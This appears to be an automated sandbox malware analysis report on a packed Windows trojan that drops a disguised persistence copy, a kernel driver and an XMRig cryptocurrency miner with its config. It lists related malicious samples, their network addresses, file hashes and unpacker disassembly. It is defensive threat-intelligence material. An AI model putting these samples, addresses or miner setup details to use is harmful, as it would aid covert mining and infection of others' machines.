ZENON-ASMoscowRussiaRU | 8TD8GfTtaW.exe | malicious | 195.2.84.91
ZENON-ASMoscowRussiaRU | O0B8ie2Wx5.exe | malicious | 195.2.85.147
ZENON-ASMoscowRussiaRU | 6f4D1pyRb9.exe | malicious | 195.2.85.147
ZENON-ASMoscowRussiaRU | fqGEBlycxR.exe | malicious | 195.2.85.147
ZENON-ASMoscowRussiaRU | e4AJaKFTKE.exe | malicious | 195.2.85.147
ZENON-ASMoscowRussiaRU | HGGU5vbVLG.exe | malicious | 195.2.85.147
ZENON-ASMoscowRussiaRU | SKOakPjoWi.exe | malicious | 195.2.85.147
ZENON-ASMoscowRussiaRU | GJZLI8p7JH.exe | malicious | 195.2.85.147
ZENON-ASMoscowRussiaRU | MLcL3Hh1M6.exe | malicious | 195.2.85.147
ZENON-ASMoscowRussiaRU | QLPuFu7bkA.exe | malicious | 195.2.85.147
ZENON-ASMoscowRussiaRU | GOmoBhIx7j.exe | malicious | 195.2.85.147
ZENON-ASMoscowRussiaRU | 74Yht1dIMF.exe | malicious | 195.2.85.147
ZENON-ASMoscowRussiaRU | vFfAv3VnjP.exe | malicious | 195.2.85.147
ZENON-ASMoscowRussiaRU | psDdPRzpT7.exe | malicious | 195.2.85.147
ZENON-ASMoscowRussiaRU | 1rZvXik9Qt.exe | malicious | 195.2.85.147
ZENON-ASMoscowRussiaRU | X5O7D8deGn.exe | malicious | 195.2.85.147
HETZNER-ASDE | SecuriteInfo.com.Trojan.GenericKD.45695593.9197.exe | malicious | 195.201.225.248
HETZNER-ASDE | SecuriteInfo.com.Trojan.Siggen12.2497.1023.exe | malicious | 88.99.66.31
HETZNER-ASDE | 1vuet1S3tI.exe | malicious | 88.99.66.31
HETZNER-ASDE | MV9tCJw8Xr.exe | malicious | 195.201.56.70
HETZNER-ASDE | seed.exe | malicious | 88.99.66.31
HETZNER-ASDE | SecuriteInfo.com.Variant.Zusy.368685.25375.exe | malicious | 88.99.66.31
HETZNER-ASDE | SecuriteInfo.com.Trojan.GenericKDZ.73124.19170.exe | malicious | 95.216.186.40
HETZNER-ASDE | SecuriteInfo.com.Trojan.GenericKDZ.73123.31244.exe | malicious | 88.99.66.31
HETZNER-ASDE | SecuriteInfo.com.Trojan.GenericKD.36273230.25906.exe | malicious | 195.201.225.248
HETZNER-ASDE | SecuriteInfo.com.Variant.Zusy.368685.25618.exe | malicious | 88.99.66.31
HETZNER-ASDE | SecuriteInfo.com.Trojan.GenericKDZ.73124.19170.exe | malicious | 95.216.186.40
HETZNER-ASDE | SecuriteInfo.com.Trojan.GenericKDZ.73123.31244.exe | malicious | 95.216.186.40
HETZNER-ASDE | SecuriteInfo.com.Trojan.GenericKD.36273230.25906.exe | malicious | 195.201.225.248
HETZNER-ASDE | 8WjU4jrBIr.exe | malicious | 94.130.165.85
HETZNER-ASDE | Quotation-Project at Hor Al Anz CAIRO_012245666.pdf.exe | malicious |
                                              • 188.40.67.173
                                              8TD8GfTtaW.exeGet hashmaliciousBrowse
                                              • 88.99.66.31
                                              Order_20180218001.exeGet hashmaliciousBrowse
                                              • 135.181.57.206
                                              unmapped_executable_of_polyglot_duke.dllGet hashmaliciousBrowse
                                              • 5.9.110.84
                                              DHL eInvoice_Pdf.exeGet hashmaliciousBrowse
                                              • 195.201.179.80
                                              Subconract 504.xlsmGet hashmaliciousBrowse
                                              • 95.216.245.130
                                              CLOUDFLARENETUSST_PLC URGENT ORDER 0223308737,pdf.exeGet hashmaliciousBrowse
                                              • 104.21.19.200
                                              SecuriteInfo.com.Trojan.GenericKD.45695593.9197.exeGet hashmaliciousBrowse
                                              • 172.67.199.58
                                              SecuriteInfo.com.Trojan.Siggen12.2497.1023.exeGet hashmaliciousBrowse
                                              • 104.23.98.190
                                              1vuet1S3tI.exeGet hashmaliciousBrowse
                                              • 172.67.199.58
                                              P00760000.exeGet hashmaliciousBrowse
                                              • 104.21.19.200
                                              Order.docGet hashmaliciousBrowse
                                              • 104.21.19.200
                                              QUOTE.docGet hashmaliciousBrowse
                                              • 104.21.19.200
                                              Shipment Notification 6368638172.pdf.exeGet hashmaliciousBrowse
                                              • 172.67.188.154
                                              2070121_SN-WS.exeGet hashmaliciousBrowse
                                              • 104.21.71.230
                                              purchase order.exeGet hashmaliciousBrowse
                                              • 104.21.19.200
                                              9073782912,pdf.exeGet hashmaliciousBrowse
                                              • 104.21.19.200
                                              payment_advice.docGet hashmaliciousBrowse
                                              • 172.67.172.17
                                              IMG_57109_Scanned.docGet hashmaliciousBrowse
                                              • 172.67.188.154
                                              Purchase Order.exeGet hashmaliciousBrowse
                                              • 104.21.19.200
                                              dot crypted.exeGet hashmaliciousBrowse
                                              • 104.21.19.200
                                              New Order 2300030317388 InterMetro.exeGet hashmaliciousBrowse
                                              • 172.67.172.17
                                              CN-Invoice-XXXXX9808-19011143287989.exeGet hashmaliciousBrowse
                                              • 172.67.172.17
                                              Purchase Order list.exeGet hashmaliciousBrowse
                                              • 104.21.23.61
                                              RkoKlvuLh6.exeGet hashmaliciousBrowse
                                              • 162.159.136.232
                                              i0fOtOV8v0.exeGet hashmaliciousBrowse
                                              • 104.23.99.190

                                              JA3 Fingerprints


                                              Dropped Files


                                                                                                Created / dropped Files

                                                                                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RantimeBroker.exe.log
                                                                                                Process:C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe
                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):226
                                                                                                Entropy (8bit):5.3467126928258955
                                                                                                Encrypted:false
                                                                                                SSDEEP:6:Q3La/xw5DLIP12MUAvvR+uTL2LDY3U21v:Q3La/KDLI4MWuPk21v
                                                                                                MD5:DD8B7A943A5D834CEEAB90A6BBBF4781
                                                                                                SHA1:2BED8D47DF1C0FF76B40811E5F11298BD2D06389
                                                                                                SHA-256:E1D0A304B16BE51AE361E392A678D887AB0B76630B42A12D252EDC0484F0333B
                                                                                                SHA-512:24167174EA259CAF57F65B9B9B9C113DD944FC957DB444C2F66BC656EC2E6565EFE4B4354660A5BE85CE4847434B3BDD4F7E05A9E9D61F4CC99FF0284DAA1C87
                                                                                                Malicious:false
                                                                                                Reputation:moderate, very likely benign file
                                                                                                Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..
                                                                                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe.log
                                                                                                Process:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe
                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):847
                                                                                                Entropy (8bit):5.35816127824051
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:ML9E4Ks2wKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7a:MxHKXwYHKhQnoPtHoxHhAHKzva
                                                                                                MD5:31E089E21A2AEB18A2A23D3E61EB2167
                                                                                                SHA1:E873A8FC023D1C6D767A0C752582E3C9FD67A8B0
                                                                                                SHA-256:2DCCE5D76F242AF36DB3D670C006468BEEA4C58A6814B2684FE44D45E7A3F836
                                                                                                SHA-512:A0DB65C3E133856C0A73990AEC30B1B037EA486B44E4A30657DD5775880FB9248D9E1CB533420299D0538882E9A883BA64F30F7263EB0DD62D1C673E7DBA881D
                                                                                                Malicious:true
                                                                                                Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21e8e2b95c\System.Xml.ni.dll",0..
                                                                                                C:\Users\user\AppData\Local\pg2bsuqa.exe
                                                                                                Process:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):4964504
                                                                                                Entropy (8bit):7.901098351320417
                                                                                                Encrypted:false
                                                                                                SSDEEP:98304:3Fo69yX+tlgGpThihQhFGooC309rxysgTNmYZHxgXVh:3vwweGfU4Uoz3YrxysghN1+j
                                                                                                MD5:70DCA411445D3B4394D9C467BF3FF994
                                                                                                SHA1:83F9120B2B184EB991D1DCBF4BB13D5F2F4A6097
                                                                                                SHA-256:1D1F06C0D0965296755770B3F6A70A90E0D21A57EF5E47F9A26FCC4008AD45EF
                                                                                                SHA-512:4A2F84A8FB4BB0EBA8402EB417CADB8BCEF6AC309EE4918A698CAB756EA888FF076545E1ED02F85F5705FE15F7EB7EC01B68C3BC98F74B4E13F5B8E4F0184CD6
                                                                                                Malicious:true
                                                                                                Antivirus:
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: Metadefender, Detection: 24%
• Antivirus: ReversingLabs, Detection: 66%
Joe Sandbox View:
• Filename: 1vuet1S3tI.exe, Detection: malicious
• Filename: 8WjU4jrBIr.exe, Detection: malicious
• Filename: 8TD8GfTtaW.exe, Detection: malicious
                                                                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....C................0.. ..........\d... ...@....@.. .............................d.K...@.................................0L..d........?............K..............................................................`..P........................... . ... ...................... ..` O....@......................@..@ ............................@..@.idata... ..........................@....apk0....@... ......................@..@.themida..(..`......................`....boot.........9.....................`..`.apk1....2....G.....................`..`.apk2... YE.. Z..\E.................`..`.reloc...............`E.............@..@.rsrc....?.......@...hE.............@..@........................................................................................................................................................................................
                                                                                                C:\Users\user\AppData\Local\zmql3v0y.exe
                                                                                                Process:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):2611424
                                                                                                Entropy (8bit):7.959583416242755
                                                                                                Encrypted:false
                                                                                                SSDEEP:49152:h2hQa6GzMPl06GX74Y0ae1K+qWhbQjKHiSxLTDhK9wVjGHTkg:h2h7Nzi5k7B09E+fhbQjKHfDs9+jGd
                                                                                                MD5:F0ECEFED65B00699CC2B57BF81492F56
                                                                                                SHA1:4E0FBC13AF6C373C9944A53A40965517B619C274
                                                                                                SHA-256:83F953427624EABA72E6D34339B4004C3614657BFE9FB601ECA7E76410B71325
                                                                                                SHA-512:83BFDD06BF7E3497D6D0EC1686EDE07D11003057919CDB74B3224E1DEEB6DFA9259A83344C419CA0B2DEC4CD42292C6047D842EEB09CF3459D6AC6C21130533F
                                                                                                Malicious:true
                                                                                                Antivirus:
• Antivirus: ReversingLabs, Detection: 61%
Joe Sandbox View:
• Filename: 1vuet1S3tI.exe, Detection: malicious
• Filename: 8WjU4jrBIr.exe, Detection: malicious
• Filename: 8TD8GfTtaW.exe, Detection: malicious
                                                                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....1`.................P..........X.E.. ........@.. .......................@m.......(...@.................................:...P.....................'..6.......................................................................................... .`... ...*.................. ..` ............................@..@ .............2..............@..B.idata... ...........4..............@....rsrc.... ...........6..............@..@.themida..D..........<..............`....boot....f'...E..f'..<..............`..`........................................................................................................................................................................................................................................................................................................................................................
                                                                                                C:\Users\user\AppData\Roaming\Windows\CPU\WinRing0x64.sys
                                                                                                Process:C:\Users\user\AppData\Local\zmql3v0y.exe
                                                                                                File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):14544
                                                                                                Entropy (8bit):6.2660301556221185
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:nqjKhp+GQvzj3i+5T9oGYJh1wAoxhSF6OOoe068jSJUbueq1H2PIP0:qjKL+v/y+5TWGYOf2OJ06dUb+pQ
                                                                                                MD5:0C0195C48B6B8582FA6F6373032118DA
                                                                                                SHA1:D25340AE8E92A6D29F599FEF426A2BC1B5217299
                                                                                                SHA-256:11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
                                                                                                SHA-512:AB28E99659F219FEC553155A0810DE90F0C5B07DC9B66BDA86D7686499FB0EC5FDDEB7CD7A3C5B77DCCB5E865F2715C2D81F4D40DF4431C92AC7860C7E01720D
                                                                                                Malicious:true
                                                                                                Antivirus:
• Antivirus: Metadefender, Detection: 0%
• Antivirus: ReversingLabs, Detection: 0%
                                                                                                Joe Sandbox View:
                                                                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5:n.q[..q[..q[..q[..}[..V.{.t[..V.}.p[..V.m.r[..V.q.p[..V.|.p[..V.x.p[..Richq[..................PE..d....&.H.........."..................P.......................................p..............................................................dP..<....`.......@..`...................p ............................................... ..p............................text............................... ..h.rdata..|.... ......................@..H.data........0......................@....pdata..`....@......................@..HINIT...."....P...................... ....rsrc........`......................@..B................................................................................................................................................................................................................................................................................
                                                                                                C:\Users\user\AppData\Roaming\Windows\CPU\config.json
                                                                                                Process:C:\Users\user\AppData\Local\zmql3v0y.exe
                                                                                                File Type:ASCII text
                                                                                                Category:dropped
                                                                                                Size (bytes):2275
                                                                                                Entropy (8bit):3.9887353957446137
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:CtWTHcfLWHW8b9b2lZ9lDfnncC519ECoECyo12udQdJtK59:CtWTGyHocCOCZCN2uYOH
                                                                                                MD5:DF3803B8B18481FBC63A8E2CECF22500
                                                                                                SHA1:B44877D6F781A28F1AD3F0CC337C9C3CC7BFFD96
                                                                                                SHA-256:B60A267608EA13830BFE41C7EE0F726A6562855112CF2310332DAD43854E370A
                                                                                                SHA-512:8FAB13258B597C5363C727A3208426A17DC1D66AAEBEE4977B2B5C8EB4044F09626167A75E69831A45095CA2B8CFAAA57ECA6FEA93A643F43266943765F7538D
                                                                                                Malicious:true
                                                                                                Yara Hits:
                                                                                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: C:\Users\user\AppData\Roaming\Windows\CPU\config.json, Author: Joe Security
                                                                                                Preview: {. "api": {. "id": null,. "worker-id": null. },. "http": {. "enabled": false,. "host": "127.0.0.1",. "port": 0,. "access-token": null,. "restricted": true. },. "autosave": true,. "background": false,. "colors": true,. "title": true,. "randomx": {. "init": -1,. "init-avx2": -1,. "mode": "auto",. "1gb-pages": false,. "rdmsr": true,. "wrmsr": true,. "cache_qos": false,. "numa": true,. "scratchpad_prefetch_mode": 1. },. "cpu": {. "enabled": true,. "huge-pages": true,. "huge-pages-jit": false,. "hw-aes": null,. "priority": null,. "memory-pool": false,. "yield": true,. "max-threads-hint": 100,. "asm": true,. "argon2-impl": null,. "astrobwt-max-size": 550,. "cn/0": false,. "cn-lite/0": false,. "kawpow": false. },. "opencl": {. "enabled": fal
                                                                                                C:\Users\user\AppData\Roaming\Windows\CPU\cpu.exe
                                                                                                Process:C:\Users\user\AppData\Local\zmql3v0y.exe
                                                                                                File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):6889640
                                                                                                Entropy (8bit):7.882305690463656
                                                                                                Encrypted:false
                                                                                                SSDEEP:196608:1YWVn8cTUWrpYpHqtbxxfDpidYLDH+D1W+4vYz3RVB:1YW2aJrpOHqtb4dYLDHtvY1j
                                                                                                MD5:E95F766A3748042EFBF0F05D823F82B7
                                                                                                SHA1:FA4A29F9B95F4491E07EBA54A677D52D8D061A19
                                                                                                SHA-256:1AEF2FBA4058AD80E4AE16DCE0D2609E9F946BA9A4F2203891A26A92B3F6578C
                                                                                                SHA-512:E4D61199B57AE189C2BEF7ADC661224CFB00E9D6B3526C07624911238AAD2D81D9548B52DB1C6DBBF4A0E3F766D57080D2414CA836E037F0BB39728D1F1AF55C
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: Metadefender, Detection: 16%
                                                                                                • Antivirus: ReversingLabs, Detection: 66%
                                                                                                Preview: MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$.......p|v.4...4...4...ou......ou..9...ou.........0....l..'....l..>....l.......o..&...ou..!...4...k....l..+....o.......o.......o..0....o.5...4...5....o..5...Rich4...................PE..d......`..........".......1...r......R.........@....................................cji...`............................................................o.1.@.........i............. .......................0u..h...0...8............p..h............................text.....1......................... ..`.rdata.......1.....................@..@.data....@+..0D.....................@....pdata........o.....................@..@_RANDOMX......q.....................@..`_SHA3_25@.....q.....................@..`_TEXT_CN......q.....................@..`_TEXT_CN......q.....................@..`_RDATA........q.....................@..@0.............q.....................`..`1.......P?c......@c.............
                                                                                                C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe
                                                                                                Process:C:\Users\user\AppData\Local\zmql3v0y.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):2611424
                                                                                                Entropy (8bit):7.959583416242755
                                                                                                Encrypted:false
                                                                                                SSDEEP:49152:h2hQa6GzMPl06GX74Y0ae1K+qWhbQjKHiSxLTDhK9wVjGHTkg:h2h7Nzi5k7B09E+fhbQjKHfDs9+jGd
                                                                                                MD5:F0ECEFED65B00699CC2B57BF81492F56
                                                                                                SHA1:4E0FBC13AF6C373C9944A53A40965517B619C274
                                                                                                SHA-256:83F953427624EABA72E6D34339B4004C3614657BFE9FB601ECA7E76410B71325
                                                                                                SHA-512:83BFDD06BF7E3497D6D0EC1686EDE07D11003057919CDB74B3224E1DEEB6DFA9259A83344C419CA0B2DEC4CD42292C6047D842EEB09CF3459D6AC6C21130533F
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: ReversingLabs, Detection: 61%
                                                                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....1`.................P..........X.E.. ........@.. .......................@m.......(...@.................................:...P.....................'..6.......................................................................................... .`... ...*.................. ..` ............................@..@ .............2..............@..B.idata... ...........4..............@....rsrc.... ...........6..............@..@.themida..D..........<..............`....boot....f'...E..f'..<..............`..`........................................................................................................................................................................................................................................................................................................................................................
                                                                                                C:\Users\user\AppData\Roaming\Windows\cpu.zip
                                                                                                Process:C:\Users\user\AppData\Local\zmql3v0y.exe
                                                                                                File Type:Zip archive data, at least v2.0 to extract
                                                                                                Category:dropped
                                                                                                Size (bytes):6296834
                                                                                                Entropy (8bit):7.9998772929856505
                                                                                                Encrypted:true
                                                                                                SSDEEP:196608:EYt1C1WmUAsFnYtr+h3HbZe18JZPSXpzCC9o:EYMWDFnor+h3o18JZP8Po
                                                                                                MD5:E9695400A2205B4F8ECEB8B635BE7AA1
                                                                                                SHA1:9071EF76AABFD7A05F7470460C4D92D89D4D2668
                                                                                                SHA-256:66F209A9972C6E1A88E572697425A936A5DC028B2D8BC29FDDACA98FF25434B4
                                                                                                SHA-512:5EDDF9D73675E327141B820ABBBC98336DE991D50AD5D30AA15F41DF10BBB9F0E47FFD57F8600F6B5CE0E319D463F9D40EF88E9D11C884121D56B2677E91E25A
                                                                                                Malicious:false
                                                                                                Preview: PK.........z:Rgw..............config.json.V.n.0...+..C.v...-@rKQ iQ.Ea.....C.K..{Iy.D.E...C...=>.?W..*.......3.2<.V...x.,NP.<.....v...,4..K..{.jr>.....h.~...Z...{&.....Vh.i1:.J..U.[.....5...u.rU1.&.WH..n..h.......l......fh...NS..2.....?...B...........Y..q..r.L......^...e\b...xN..J.^:.$d.Vx..EL.T>.'....O."V~w.4...%.x;.:....5#.N..D&.. .\s..\....X...<<.b.E....(.l.).q..4B+.Yl..K.#08..h.~m.u.q.#MP"g.....Q....]?[.......[..T[.k._"j....S...B..c...L...-.v..4Ub.4.x.1.c..?..e......]../.I.<.r$u`3ZOG.U5..|x.."].:..o..<..><......=.?=.K-...@./N.?...X...J&...Vk.._j...;.......M.ly_..j%..`.Dp$Wn.wt.."....q.........WM..C..5....e..q.a.u.n..>...zV.s!...{m..$....D.y.|..N+....E....A.0]....D.R..Ar.E...u2....)5T.SJ.....yw*..PK........T"URu.G.$._.. i.....cpu.exe.Zg8...^......%.-....[..;W.. ....DY..e.%......6..\............y..s.o.9.e..........5....C...s......u....F9.4G9...}..=.....p..O_v.{vo?.vg.v%..vwO;{a22b.?...~.Y..1.O_O?.H.[....V.F^bdU.R.=.|...y.V2G..J..".,.d...3E

                                                                                                Static File Info

                                                                                                General

                                                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Entropy (8bit):7.954859029987119
                                                                                                TrID:
                                                                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                File name:SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe
                                                                                                File size:2817248
                                                                                                MD5:bc584a3be92cfdfda79446372fffa46d
                                                                                                SHA1:6f7d11b7c795bd1f48a078f05d8a4c5600448a03
                                                                                                SHA256:8086d2b05316a9b44f55971a6c90da8ecb069d075973654f5f914229dc3070f6
                                                                                                SHA512:39c3bbdc8e063373bf1f2358c6d264db41622a2447308edf6d01c558ff301103dbec7e0fc8970ad4822ff05a4d12d3cefb14d39736b8913886e076126d596160
                                                                                                SSDEEP:49152:Wex6LbJrFJH/6tF6kzGTjl1UNhnbDtFREyJW0rHcwBczszXo2kH9hbECVosGOb:WF9FN6tFIx1UNhbr30Y02kH7bRVosN
                                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...../`.....................2......X.H.. ...@....@.. .......................`s.....:++...@................................

                                                                                                File Icon

                                                                                                Icon Hash:6863eee6b292c6ee

                                                                                                Static PE Info

                                                                                                General

                                                                                                Entrypoint:0x88e058
                                                                                                Entrypoint Section:.boot
                                                                                                Digitally signed:true
                                                                                                Imagebase:0x400000
                                                                                                Subsystem:windows gui
                                                                                                Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                                                DLL Characteristics:TERMINAL_SERVER_AWARE, DYNAMIC_BASE
                                                                                                Time Stamp:0x602F9D0C [Fri Feb 19 11:12:12 2021 UTC]
                                                                                                TLS Callbacks:
                                                                                                CLR (.Net) Version:
                                                                                                OS Version Major:4
                                                                                                OS Version Minor:0
                                                                                                File Version Major:4
                                                                                                File Version Minor:0
                                                                                                Subsystem Version Major:4
                                                                                                Subsystem Version Minor:0
                                                                                                Import Hash:4328f7206db519cd4e82283211d98e83

                                                                                                Authenticode Signature

                                                                                                Signature Valid:false
                                                                                                Signature Issuer:CN=DigiCert High Assurance Code Signing CA-1, OU=www.digicert.com, O=DigiCert Inc, C=US
                                                                                                Signature Validation Error:The digital signature of the object did not verify
                                                                                                Error Number:-2146869232
                                                                                                Not Before, Not After
                                                                                                • 6/1/2017 5:00:00 PM 7/8/2020 5:00:00 AM
                                                                                                Subject Chain
                                                                                                • CN=Kaspersky Lab, O=Kaspersky Lab, L=Moscow, C=RU
                                                                                                Version:3
                                                                                                Thumbprint MD5:D47ED7012E116270A767DA88438C3BA6
                                                                                                Thumbprint SHA-1:3C92C9274AB6D3DD520B13029A2490C4A1D98BC0
                                                                                                Thumbprint SHA-256:3606C42F2608526263AC61997AA0A83B364FB23A6882447CA787B5A5790115D8
                                                                                                Serial:0F9D91C6ABA86F4E54CBB9EF57E68346

                                                                                                Entrypoint Preview

                                                                                                Instruction
                                                                                                call 00007FA770C14E20h
                                                                                                push ebx
                                                                                                mov ebx, esp
                                                                                                push ebx
                                                                                                mov esi, dword ptr [ebx+08h]
                                                                                                mov edi, dword ptr [ebx+10h]
                                                                                                cld
                                                                                                mov dl, 80h
                                                                                                mov al, byte ptr [esi]
                                                                                                inc esi
                                                                                                mov byte ptr [edi], al
                                                                                                inc edi
                                                                                                mov ebx, 00000002h
                                                                                                add dl, dl
                                                                                                jne 00007FA770C14CD7h
                                                                                                mov dl, byte ptr [esi]
                                                                                                inc esi
                                                                                                adc dl, dl
                                                                                                jnc 00007FA770C14CBCh
                                                                                                add dl, dl
                                                                                                jne 00007FA770C14CD7h
                                                                                                mov dl, byte ptr [esi]
                                                                                                inc esi
                                                                                                adc dl, dl
                                                                                                jnc 00007FA770C14D23h
                                                                                                xor eax, eax
                                                                                                add dl, dl
                                                                                                jne 00007FA770C14CD7h
                                                                                                mov dl, byte ptr [esi]
                                                                                                inc esi
                                                                                                adc dl, dl
                                                                                                jnc 00007FA770C14DB7h
                                                                                                add dl, dl
                                                                                                jne 00007FA770C14CD7h
                                                                                                mov dl, byte ptr [esi]
                                                                                                inc esi
                                                                                                adc dl, dl
                                                                                                adc eax, eax
                                                                                                add dl, dl
                                                                                                jne 00007FA770C14CD7h
                                                                                                mov dl, byte ptr [esi]
                                                                                                inc esi
                                                                                                adc dl, dl
                                                                                                adc eax, eax
                                                                                                add dl, dl
                                                                                                jne 00007FA770C14CD7h
                                                                                                mov dl, byte ptr [esi]
                                                                                                inc esi
                                                                                                adc dl, dl
                                                                                                adc eax, eax
                                                                                                add dl, dl
                                                                                                jne 00007FA770C14CD7h
                                                                                                mov dl, byte ptr [esi]
                                                                                                inc esi
                                                                                                adc dl, dl
                                                                                                adc eax, eax
                                                                                                je 00007FA770C14CDAh
                                                                                                push edi
                                                                                                mov eax, eax
                                                                                                sub edi, eax
                                                                                                mov al, byte ptr [edi]
                                                                                                pop edi
                                                                                                mov byte ptr [edi], al
                                                                                                inc edi
                                                                                                mov ebx, 00000002h
                                                                                                jmp 00007FA770C14C6Bh

Data Directories

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xa03a | 0x50 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xc000 | 0x2ef0 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x2ac600 | 0x36e0 | .themida
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

Sections

Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
(blank) | 0x2000 | 0x2000 | 0xa00 | False | 0.953515625 | data | 7.58163620158 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
(blank) | 0x4000 | 0x2eea | 0x1200 | False | 0.989800347222 | data | 7.85588670463 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
(blank) | 0x8000 | 0xc | 0x200 | False | 0.583984375 | data | 4.24912721916 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.idata | 0xa000 | 0x2000 | 0x200 | False | 0.16796875 | data | 1.0588173124 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc | 0xc000 | 0x3000 | 0x3000 | False | 0.361735026042 | data | 4.82035959286 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.themida | 0x10000 | 0x47e000 | 0x0 | unknown | unknown | unknown | unknown | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.boot | 0x48e000 | 0x2a7200 | 0x2a7200 | unknown | unknown | unknown | unknown | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

(Section names shown as "(blank)" were not rendered in the report; the first three sections carry no printable name.)

Resources

Name | RVA | Size | Type | Language | Country
RT_ICON | 0xc1bc | 0x668 | data | |
